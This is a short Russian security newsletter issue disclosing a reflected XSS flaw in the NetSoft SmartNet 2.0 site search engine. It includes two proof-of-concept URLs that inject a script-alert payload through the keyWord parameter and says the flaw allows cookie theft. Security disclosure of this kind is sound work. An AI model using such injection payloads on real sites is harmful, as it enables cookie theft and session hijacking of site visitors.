Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в NetSoft SmartNet.


Компьютер для продвинутых пользователей
В этом выпуске:
NetSoft SmartNet
ПО: NetSoft SmartNet
Версия: 2.0

О NetSoft SmartNet:
NetSoft SmartNet - поисковый движок для вашего сайта.
Описание:
Некоторые данные не проверяться до выполнения, что позволяет провести XSS атаку. Так атакующий может вставить JavaScript код, который выполниться на сайте. Можно использовать эту уязвимость для похищения cookie.
Пример использования:
http://www.victim.com/dataCollector/search.jsp?searchFLD=0&tableName=_meta&keyWord=<script>alert("XSS")</script>
http://www.victim.com/dataCollector/search.asp?searchFLD=0&tableName=_meta&keyWord=<script>alert("XSS")</script>
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное